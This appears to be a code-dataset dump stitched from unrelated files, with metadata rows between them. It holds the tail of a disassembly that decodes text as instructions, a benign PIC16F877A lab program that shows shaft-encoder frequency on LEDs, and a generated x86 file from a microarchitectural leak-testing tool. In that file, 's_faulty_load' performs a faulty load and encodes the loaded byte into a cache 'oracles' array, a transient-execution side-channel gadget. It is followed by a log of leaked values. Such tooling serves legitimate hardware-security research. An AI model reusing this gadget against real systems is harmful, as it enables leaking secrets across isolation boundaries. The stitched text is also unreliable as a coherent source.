0x0312 (0x000624) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x0313 (0x000626) 0x5245- f:00051 d: 69 | A = A & B | **** non-standard encoding with D:0x0045 ****
0x0314 (0x000628) 0x4356- f:00041 d: 342 | C = 1, io 0526 = BZ
0x0315 (0x00062A) 0x0000- f:00000 d: 0 | PASS
0x0316 (0x00062C) 0x4C4F- f:00046 d: 79 | A = A >> B | **** non-standard encoding with D:0x004F ****
0x0317 (0x00062E) 0x434B- f:00041 d: 331 | C = 1, io 0513 = BZ
0x0318 (0x000630) 0x4544- f:00042 d: 324 | C = 1, IOB = DN | **** non-standard encoding with D:0x0144 ****
0x0319 (0x000632) 0x0000- f:00000 d: 0 | PASS
0x031A (0x000634) 0x4445- f:00042 d: 69 | C = 1, IOB = DN | **** non-standard encoding with D:0x0045 ****
0x031B (0x000636) 0x4C41- f:00046 d: 65 | A = A >> B | **** non-standard encoding with D:0x0041 ****
0x031C (0x000638) 0x5920- f:00054 d: 288 | B = A | **** non-standard encoding with D:0x0120 ****
0x031D (0x00063A) 0x0000- f:00000 d: 0 | PASS
0x031E (0x00063C) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x031F (0x00063E) 0x4556- f:00042 d: 342 | C = 1, IOB = DN | **** non-standard encoding with D:0x0156 ****
0x0320 (0x000640) 0x4E54- f:00047 d: 84 | A = A << B | **** non-standard encoding with D:0x0054 ****
0x0321 (0x000642) 0x0000- f:00000 d: 0 | PASS
0x0322 (0x000644) 0x5045- f:00050 d: 69 | A = B | **** non-standard encoding with D:0x0045 ****
0x0323 (0x000646) 0x524D- f:00051 d: 77 | A = A & B | **** non-standard encoding with D:0x004D ****
0x0324 (0x000648) 0x2020- f:00020 d: 32 | A = OR[32]
0x0325 (0x00064A) 0x0000- f:00000 d: 0 | PASS
0x0326 (0x00064C) 0x2020- f:00020 d: 32 | A = OR[32]
0x0327 (0x00064E) 0x2020- f:00020 d: 32 | A = OR[32]
0x0328 (0x000650) 0x2020- f:00020 d: 32 | A = OR[32]
0x0329 (0x000652) 0x0000- f:00000 d: 0 | PASS
0x032A (0x000654) 0x2020- f:00020 d: 32 | A = OR[32]
0x032B (0x000656) 0x2020- f:00020 d: 32 | A = OR[32]
0x032C (0x000658) 0x2020- f:00020 d: 32 | A = OR[32]
0x032D (0x00065A) 0x0000- f:00000 d: 0 | PASS
0x032E (0x00065C) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x032F (0x00065E) 0x492F- f:00044 d: 303 | A = A > B | **** non-standard encoding with D:0x012F ****
0x0330 (0x000660) 0x4F20- f:00047 d: 288 | A = A << B | **** non-standard encoding with D:0x0120 ****
0x0331 (0x000662) 0x0000- f:00000 d: 0 | PASS
0x0332 (0x000664) 0x2020- f:00020 d: 32 | A = OR[32]
0x0333 (0x000666) 0x2020- f:00020 d: 32 | A = OR[32]
0x0334 (0x000668) 0x2020- f:00020 d: 32 | A = OR[32]
0x0335 (0x00066A) 0x0000- f:00000 d: 0 | PASS
0x0336 (0x00066C) 0x2020- f:00020 d: 32 | A = OR[32]
0x0337 (0x00066E) 0x2020- f:00020 d: 32 | A = OR[32]
0x0338 (0x000670) 0x2020- f:00020 d: 32 | A = OR[32]
0x0339 (0x000672) 0x0000- f:00000 d: 0 | PASS
0x033A (0x000674) 0x522D- f:00051 d: 45 | A = A & B | **** non-standard encoding with D:0x002D ****
0x033B (0x000676) 0x494E- f:00044 d: 334 | A = A > B | **** non-standard encoding with D:0x014E ****
0x033C (0x000678) 0x2020- f:00020 d: 32 | A = OR[32]
0x033D (0x00067A) 0x0000- f:00000 d: 0 | PASS
0x033E (0x00067C) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x033F (0x00067E) 0x4D45- f:00046 d: 325 | A = A >> B | **** non-standard encoding with D:0x0145 ****
0x0340 (0x000680) 0x4D20- f:00046 d: 288 | A = A >> B | **** non-standard encoding with D:0x0120 ****
0x0341 (0x000682) 0x0000- f:00000 d: 0 | PASS
0x0342 (0x000684) 0x2020- f:00020 d: 32 | A = OR[32]
0x0343 (0x000686) 0x2020- f:00020 d: 32 | A = OR[32]
0x0344 (0x000688) 0x2020- f:00020 d: 32 | A = OR[32]
0x0345 (0x00068A) 0x0000- f:00000 d: 0 | PASS
0x0346 (0x00068C) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x0347 (0x00068E) 0x4F50- f:00047 d: 336 | A = A << B | **** non-standard encoding with D:0x0150 ****
0x0348 (0x000690) 0x2020- f:00020 d: 32 | A = OR[32]
0x0349 (0x000692) 0x0000- f:00000 d: 0 | PASS
0x034A (0x000694) 0x512D- f:00050 d: 301 | A = B | **** non-standard encoding with D:0x012D ****
0x034B (0x000696) 0x5441- f:00052 d: 65 | A = A + B | **** non-standard encoding with D:0x0041 ****
0x034C (0x000698) 0x5045- f:00050 d: 69 | A = B | **** non-standard encoding with D:0x0045 ****
0x034D (0x00069A) 0x0000- f:00000 d: 0 | PASS
0x034E (0x00069C) 0x512D- f:00050 d: 301 | A = B | **** non-standard encoding with D:0x012D ****
0x034F (0x00069E) 0x4558- f:00042 d: 344 | C = 1, IOB = DN | **** non-standard encoding with D:0x0158 ****
0x0350 (0x0006A0) 0x4543- f:00042 d: 323 | C = 1, IOB = DN | **** non-standard encoding with D:0x0143 ****
0x0351 (0x0006A2) 0x0000- f:00000 d: 0 | PASS
0x0352 (0x0006A4) 0x522D- f:00051 d: 45 | A = A & B | **** non-standard encoding with D:0x002D ****
0x0353 (0x0006A6) 0x4F55- f:00047 d: 341 | A = A << B | **** non-standard encoding with D:0x0155 ****
0x0354 (0x0006A8) 0x5420- f:00052 d: 32 | A = A + B | **** non-standard encoding with D:0x0020 ****
0x0355 (0x0006AA) 0x0000- f:00000 d: 0 | PASS
0x0356 (0x0006AC) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x0357 (0x0006AE) 0x5359- f:00051 d: 345 | A = A & B | **** non-standard encoding with D:0x0159 ****
0x0358 (0x0006B0) 0x5320- f:00051 d: 288 | A = A & B | **** non-standard encoding with D:0x0120 ****
0x0359 (0x0006B2) 0x0000- f:00000 d: 0 | PASS
0x035A (0x0006B4) 0x5846- f:00054 d: 70 | B = A | **** non-standard encoding with D:0x0046 ****
0x035B (0x0006B6) 0x4552- f:00042 d: 338 | C = 1, IOB = DN | **** non-standard encoding with D:0x0152 ****
0x035C (0x0006B8) 0x4E47- f:00047 d: 71 | A = A << B | **** non-standard encoding with D:0x0047 ****
0x035D (0x0006BA) 0x0000- f:00000 d: 0 | PASS
0x035E (0x0006BC) 0x524F- f:00051 d: 79 | A = A & B | **** non-standard encoding with D:0x004F ****
0x035F (0x0006BE) 0x4C4C- f:00046 d: 76 | A = A >> B | **** non-standard encoding with D:0x004C ****
0x0360 (0x0006C0) 0x4544- f:00042 d: 324 | C = 1, IOB = DN | **** non-standard encoding with D:0x0144 ****
0x0361 (0x0006C2) 0x0000- f:00000 d: 0 | PASS
0x0362 (0x0006C4) 0x2020- f:00020 d: 32 | A = OR[32]
0x0363 (0x0006C6) 0x2020- f:00020 d: 32 | A = OR[32]
0x0364 (0x0006C8) 0x2020- f:00020 d: 32 | A = OR[32]
0x0365 (0x0006CA) 0x0000- f:00000 d: 0 | PASS
0x0366 (0x0006CC) 0x532D- f:00051 d: 301 | A = A & B | **** non-standard encoding with D:0x012D ****
0x0367 (0x0006CE) 0x5846- f:00054 d: 70 | B = A | **** non-standard encoding with D:0x0046 ****
0x0368 (0x0006D0) 0x4552- f:00042 d: 338 | C = 1, IOB = DN | **** non-standard encoding with D:0x0152 ****
0x0369 (0x0006D2) 0x0000- f:00000 d: 0 | PASS
0x036A (0x0006D4) 0x4558- f:00042 d: 344 | C = 1, IOB = DN | **** non-standard encoding with D:0x0158 ****
0x036B (0x0006D6) 0x4354- f:00041 d: 340 | C = 1, io 0524 = BZ
0x036C (0x0006D8) 0x4E47- f:00047 d: 71 | A = A << B | **** non-standard encoding with D:0x0047 ****
0x036D (0x0006DA) 0x0000- f:00000 d: 0 | PASS
0x036E (0x0006DC) 0x2020- f:00020 d: 32 | A = OR[32]
0x036F (0x0006DE) 0x2020- f:00020 d: 32 | A = OR[32]
0x0370 (0x0006E0) 0x2020- f:00020 d: 32 | A = OR[32]
0x0371 (0x0006E2) 0x0000- f:00000 d: 0 | PASS
0x0372 (0x0006E4) 0x494E- f:00044 d: 334 | A = A > B | **** non-standard encoding with D:0x014E ****
0x0373 (0x0006E6) 0x204D- f:00020 d: 77 | A = OR[77]
0x0374 (0x0006E8) 0x454D- f:00042 d: 333 | C = 1, IOB = DN | **** non-standard encoding with D:0x014D ****
0x0375 (0x0006EA) 0x0000- f:00000 d: 0 | PASS
0x0376 (0x0006EC) 0x2E30- f:00027 d: 48 | OR[48] = OR[48] - 1
0x0377 (0x0006EE) 0x0000- f:00000 d: 0 | PASS
0x0378 (0x0006F0) 0x2E30- f:00027 d: 48 | OR[48] = OR[48] - 1
0x0379 (0x0006F2) 0x0000- f:00000 d: 0 | PASS
0x037A (0x0006F4) 0x2E31- f:00027 d: 49 | OR[49] = OR[49] - 1
0x037B (0x0006F6) 0x0000- f:00000 d: 0 | PASS
0x037C (0x0006F8) 0x2E31- f:00027 d: 49 | OR[49] = OR[49] - 1
0x037D (0x0006FA) 0x0000- f:00000 d: 0 | PASS
0x037E (0x0006FC) 0x2E32- f:00027 d: 50 | OR[50] = OR[50] - 1
0x037F (0x0006FE) 0x0000- f:00000 d: 0 | PASS
0x0380 (0x000700) 0x2E33- f:00027 d: 51 | OR[51] = OR[51] - 1
0x0381 (0x000702) 0x0000- f:00000 d: 0 | PASS
0x0382 (0x000704) 0x2E33- f:00027 d: 51 | OR[51] = OR[51] - 1
0x0383 (0x000706) 0x0000- f:00000 d: 0 | PASS
0x0384 (0x000708) 0x2E34- f:00027 d: 52 | OR[52] = OR[52] - 1
0x0385 (0x00070A) 0x0000- f:00000 d: 0 | PASS
0x0386 (0x00070C) 0x2E34- f:00027 d: 52 | OR[52] = OR[52] - 1
0x0387 (0x00070E) 0x0000- f:00000 d: 0 | PASS
0x0388 (0x000710) 0x2E35- f:00027 d: 53 | OR[53] = OR[53] - 1
0x0389 (0x000712) 0x0000- f:00000 d: 0 | PASS
0x038A (0x000714) 0x2E36- f:00027 d: 54 | OR[54] = OR[54] - 1
0x038B (0x000716) 0x0000- f:00000 d: 0 | PASS
0x038C (0x000718) 0x2E36- f:00027 d: 54 | OR[54] = OR[54] - 1
0x038D (0x00071A) 0x0000- f:00000 d: 0 | PASS
0x038E (0x00071C) 0x2E37- f:00027 d: 55 | OR[55] = OR[55] - 1
0x038F (0x00071E) 0x0000- f:00000 d: 0 | PASS
0x0390 (0x000720) 0x2E37- f:00027 d: 55 | OR[55] = OR[55] - 1
0x0391 (0x000722) 0x0000- f:00000 d: 0 | PASS
0x0392 (0x000724) 0x2E38- f:00027 d: 56 | OR[56] = OR[56] - 1
0x0393 (0x000726) 0x0000- f:00000 d: 0 | PASS
0x0394 (0x000728) 0x2E39- f:00027 d: 57 | OR[57] = OR[57] - 1
0x0395 (0x00072A) 0x0000- f:00000 d: 0 | PASS
0x0396 (0x00072C) 0x5945- f:00054 d: 325 | B = A | **** non-standard encoding with D:0x0145 ****
0x0397 (0x00072E) 0x5320- f:00051 d: 288 | A = A & B | **** non-standard encoding with D:0x0120 ****
0x0398 (0x000730) 0x4E4F- f:00047 d: 79 | A = A << B | **** non-standard encoding with D:0x004F ****
0x0399 (0x000732) 0x2020- f:00020 d: 32 | A = OR[32]
0x039A (0x000734) 0x454E- f:00042 d: 334 | C = 1, IOB = DN | **** non-standard encoding with D:0x014E ****
0x039B (0x000736) 0x4420- f:00042 d: 32 | C = 1, IOB = DN | **** non-standard encoding with D:0x0020 ****
0x039C (0x000738) 0x4F46- f:00047 d: 326 | A = A << B | **** non-standard encoding with D:0x0146 ****
0x039D (0x00073A) 0x2044- f:00020 d: 68 | A = OR[68]
0x039E (0x00073C) 0x4154- f:00040 d: 340 | C = 1, io 0524 = DN
0x039F (0x00073E) 0x4100- f:00040 d: 256 | C = 1, io 0400 = DN
0x03A0 (0x000740) 0x4E4F- f:00047 d: 79 | A = A << B | **** non-standard encoding with D:0x004F ****
0x03A1 (0x000742) 0x5420- f:00052 d: 32 | A = A + B | **** non-standard encoding with D:0x0020 ****
0x03A2 (0x000744) 0x4C4F- f:00046 d: 79 | A = A >> B | **** non-standard encoding with D:0x004F ****
0x03A3 (0x000746) 0x4747- f:00043 d: 327 | C = 1, IOB = BZ | **** non-standard encoding with D:0x0147 ****
0x03A4 (0x000748) 0x4544- f:00042 d: 324 | C = 1, IOB = DN | **** non-standard encoding with D:0x0144 ****
0x03A5 (0x00074A) 0x204F- f:00020 d: 79 | A = OR[79]
0x03A6 (0x00074C) 0x4E00- f:00047 d: 0 | A = A << B
0x03A7 (0x00074E) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x03A8 (0x000750) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x03A9 (0x000752) 0x2D00- f:00026 d: 256 | OR[256] = OR[256] + 1
0x03AA (0x000754) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x03AB (0x000756) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x03AC (0x000758) 0x2D2D- f:00026 d: 301 | OR[301] = OR[301] + 1
0x03AD (0x00075A) 0x0000- f:00000 d: 0 | PASS
0x03AE (0x00075C) 0x2A2A- f:00025 d: 42 | OR[42] = A + OR[42]
0x03AF (0x00075E) 0x2A2A- f:00025 d: 42 | OR[42] = A + OR[42]
0x03B0 (0x000760) 0x2A00- f:00025 d: 0 | OR[0] = A + OR[0]
0x03B1 (0x000762) 0x0000- f:00000 d: 0 | PASS
0x03B2 (0x000764) 0x0000- f:00000 d: 0 | PASS
0x03B3 (0x000766) 0x0000- f:00000 d: 0 | PASS
| 84.959276 | 127 | 0.468404 |
6b916e44ff86f175033ec53a1afdd862d05cdfb7 | 5,206 | asm | Assembly | Microcontroller_Lab/Lab_8/Exp8_EX.asm | MuhammadAlBarham/pic16f778_projects | c12e15e48a62cd16f869cbe9411728a4eea8f499 | [
"MIT"
] | null | null | null | Microcontroller_Lab/Lab_8/Exp8_EX.asm | MuhammadAlBarham/pic16f778_projects | c12e15e48a62cd16f869cbe9411728a4eea8f499 | [
"MIT"
] | null | null | null | Microcontroller_Lab/Lab_8/Exp8_EX.asm | MuhammadAlBarham/pic16f778_projects | c12e15e48a62cd16f869cbe9411728a4eea8f499 | [
"MIT"
] | null | null | null | ;**********************************************************
; This program used to find the frequency of shaft encoder using Timer0 and Timer1
; Show the frequency on bargraph LED connected to PORT D
; The signal of shaft encoder is connected to RA4 as a clock to Timer0
; 7-Segments is connected to PORTB (We connect RB0 to a, RB1 to b ???.And RB6 to g)to show the numbers on 7-seg
; The program uses a PIC16F877A running at crystal oscillator of frequency 4MHz.
;**********************************************************
include "p16f877A.inc"
;**********************************************************
; Macro definitions
push macro
movwf WTemp ; WTemp must be reserved in all banks
swapf STATUS,W ; store in W without affecting status bits
banksel StatusTemp ; select StatusTemp bank
movwf StatusTemp ; save STATUS
endm
pop macro
banksel StatusTemp ; point to StatusTemp bank
swapf StatusTemp,W; unswap STATUS nibbles into W
movwf STATUS ; restore STATUS
swapf WTemp,F ; unswap W nibbles
swapf WTemp,W ; restore W without affecting STATUS
endm
;**********************************************************
; User-defined variables
cblock 0x20 ; bank 0 assignnments
WTemp ; WTemp must be reserved in all banks
StatusTemp
Timer0Counts
counter
endc
cblock 0x0A0 ; bank 1 assignnments
WTemp1 ; bank 1 WTemp
endc
cblock 0x120 ; bank 2 assignnments
WTemp2 ; bank 2 WTemp
endc
cblock 0x1A0 ; bank 3 assignnments
WTemp3 ; bank 3 WTemp
endc
;**********************************************************
; Start of executable code
org 0x00 ;Reset vector
nop
goto Main
org 0x04
goto INT_SVC
;;;;;;; Main program ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Main
call Initial ;Initialize everything
MainLoop
call Range_Test
goto MainLoop ;Do it again
;;;;;;; Initial subroutine ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This subroutine performs all initializations of variables and registers.
Initial
banksel TRISA ;Select bank1
clrf TRISD ;set all bits of port D to output
movlw 0x07
movwf ADCON1 ;set port A to digital I/O pins
movlw 0xFF
movwf TRISA ;set port A to inputs
movlw 0x28
movwf OPTION_REG ;TMR0 Clock Source Transition on RA4/T0CKI pin
;Incr yyhmement on low-to-high transition on RA4/T0CKI pin
;Prescaler is assigned to the WDT module,Prescaler WDT (1:1)
bsf INTCON,GIE ;Enable Global Interrupt
bsf INTCON,PEIE ;Enable peripheral interrupts
bsf PIE1,TMR1IE ;Enable Timer1
banksel PORTA
movlw 0xDF ;..
movwf TMR1L ;..
movlw 0x0B ;..
movwf TMR1H ;initialize TMR1 with 3039 counts to get interrupt every 0.5 Sec.
movlw 0x30
movwf T1CON ;TMR1 Prescale (1:8),TMR1 Oscillator is shut-off
;Timer1 Clock Source = Internal clock (FOSC/4)
bsf T1CON,TMR1ON ;Enables Timer1
clrf PORTD ;initialize all LEDs OFF
clrf TMR0 ;reset TMR0
clrf Timer0Counts
clrf counter
Return
;;;;;;; Range_Test subroutine ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This subroutine performs test the range of counts and show them on the LEDs.
Range_Test
movf Timer0Counts,w
btfsc STATUS,Z
goto No_Freq
;If the Carry equal to 1 the value will be higher
;Else the value will be smaller
sublw D'10' ;Freq less than (10)*2=20Hz,0<Freq<20
btfsc STATUS,C
goto One
movf Timer0Counts,w
sublw D'25' ;Freq less than (25)*2=50Hz,20<Freq<50
btfsc STATUS,C
goto Two
movf Timer0Counts,w
sublw D'40' ;Freq less than (40)*2=80Hz,50<Freq<80
btfsc STATUS,C
goto Three
movf Timer0Counts,w
sublw D'55' ;Freq less than (55)*2=110Hz,80<Freq<110
btfsc STATUS,C
goto Four
movf Timer0Counts,w
sublw D'70' ;Freq less than (70)*2=140Hz,110<Freq<140
btfsc STATUS,C
goto Five
goto Six ;Freq greater than 140Hz/
One
movlw 0x01
movwf PORTD
goto Finish
Two
movlw 0x03
movwf PORTD
goto Finish
Three
movlw 0x07
movwf PORTD
goto Finish
Four
movlw 0x0F
movwf PORTD
goto Finish
Five
movlw 0x1F
movwf PORTD
goto Finish
Six
movlw 0x3F
movwf PORTD
goto Finish
No_Freq
clrf PORTD
Finish
Return
;**********************************************************
; TIMER1 RE-Initialize and reset
T1
movlw 0xDD ;..
movwf TMR1L ;..
movlw 0x0B ;..
movwf TMR1H ;initialize TMR1 with 3037 counts to get interrupt every 0.5 Sec.
bcf PIR1,TMR1IF
incf counter,1
goto POLL ;Check for another interrupt
;**********************************************************
INT_SVC
push
POLL
btfsc PIR1,TMR1IF ; Check for an TMR1 Interrupt (This inerrupt means that take value every 0.5 second )
goto T1
movf counter,0
sublw D'2'
btfss STATUS,Z
goto finish
movf TMR0,w ;Take the value of the frequence of the Shaft Encoder
movwf Timer0Counts ;Save this value in the Timer0Counter
clrf TMR0 ;Clear the Timer to get another value of frequency
clrf counter
finish
bsf T1CON,TMR1ON ;Make Timer1 to be On
pop
retfie
;**********************************************************
End | 28.604396 | 113 | 0.613331 |
ae1fe9435d854b25e642888a978057af2a4a3507 | 7,837 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1835.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1835.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1835.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x1ad00, %rdx
nop
nop
nop
nop
nop
add $18439, %r14
and $0xffffffffffffffc0, %rdx
vmovaps (%rdx), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $0, %xmm4, %r9
nop
nop
and %r8, %r8
lea addresses_D_ht+0x14800, %rax
nop
nop
nop
nop
xor $5234, %r12
and $0xffffffffffffffc0, %rax
movntdqa (%rax), %xmm3
vpextrq $0, %xmm3, %rdx
nop
nop
add $21511, %rax
lea addresses_WC_ht+0x7e0, %r12
nop
add %r14, %r14
mov $0x6162636465666768, %rax
movq %rax, %xmm5
movups %xmm5, (%r12)
nop
nop
nop
nop
nop
and %r12, %r12
lea addresses_UC_ht+0x3d00, %rsi
lea addresses_D_ht+0x8e80, %rdi
nop
nop
nop
nop
nop
cmp $6215, %rax
mov $118, %rcx
rep movsb
nop
nop
nop
mfence
lea addresses_D_ht+0x2ae0, %r9
nop
nop
nop
sub %rcx, %rcx
movups (%r9), %xmm7
vpextrq $0, %xmm7, %rdx
nop
nop
nop
nop
nop
xor $34155, %rcx
lea addresses_normal_ht+0xd300, %rsi
lea addresses_normal_ht+0x16940, %rdi
nop
nop
nop
cmp $34262, %r8
mov $71, %rcx
rep movsl
nop
nop
nop
cmp %rsi, %rsi
lea addresses_WC_ht+0x1a8fc, %rsi
lea addresses_WT_ht+0x5750, %rdi
nop
nop
nop
dec %r8
mov $39, %rcx
rep movsb
nop
nop
nop
nop
and %rax, %rax
lea addresses_WC_ht+0x13f10, %rsi
lea addresses_normal_ht+0x80d8, %rdi
nop
nop
nop
nop
cmp $56497, %r8
mov $70, %rcx
rep movsl
nop
nop
nop
and %rax, %rax
lea addresses_normal_ht+0x1d600, %rsi
lea addresses_UC_ht+0x3d00, %rdi
nop
inc %r12
mov $114, %rcx
rep movsb
nop
nop
nop
nop
sub $13272, %r14
lea addresses_normal_ht+0x300, %rdi
nop
nop
nop
and %r12, %r12
vmovups (%rdi), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %r14
nop
nop
nop
nop
nop
sub %r8, %r8
lea addresses_WC_ht+0xe480, %r12
sub %rdi, %rdi
mov $0x6162636465666768, %r14
movq %r14, (%r12)
xor $20276, %rdi
lea addresses_WC_ht+0x19900, %r14
nop
nop
nop
nop
cmp $25433, %rsi
movb $0x61, (%r14)
nop
nop
nop
sub $32299, %r9
lea addresses_WT_ht+0x1d262, %r14
nop
add $24066, %r12
movl $0x61626364, (%r14)
nop
nop
sub %r12, %r12
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r8
pop %r14
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
// REPMOV
lea addresses_WT+0x15de0, %rsi
lea addresses_WT+0x15500, %rdi
clflush (%rdi)
nop
nop
cmp %r12, %r12
mov $96, %rcx
rep movsw
nop
add %rcx, %rcx
// Faulty Load
lea addresses_WC+0xdd00, %rbp
nop
nop
sub $49115, %r12
mov (%rbp), %rdi
lea oracles, %rsi
and $0xff, %rdi
shlq $12, %rdi
mov (%rsi,%rdi,1), %rdi
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %r12
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_WC', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WT', 'congruent': 3, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT', 'congruent': 8, 'same': False}}
[Faulty Load]
{'src': {'type': 'addresses_WC', 'AVXalign': False, 'size': 8, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_UC_ht', 'AVXalign': True, 'size': 32, 'NT': True, 'same': False, 'congruent': 10}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'AVXalign': False, 'size': 16, 'NT': True, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 3}}
{'src': {'type': 'addresses_UC_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 6, 'same': False}}
{'src': {'type': 'addresses_D_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 3}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 1, 'same': False}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 4, 'same': False}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}}
{'src': {'type': 'addresses_normal_ht', 'congruent': 7, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}}
{'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 8}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 4}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': True, 'congruent': 10}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 4, 'NT': True, 'same': False, 'congruent': 1}}
{'38': 21829}
38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 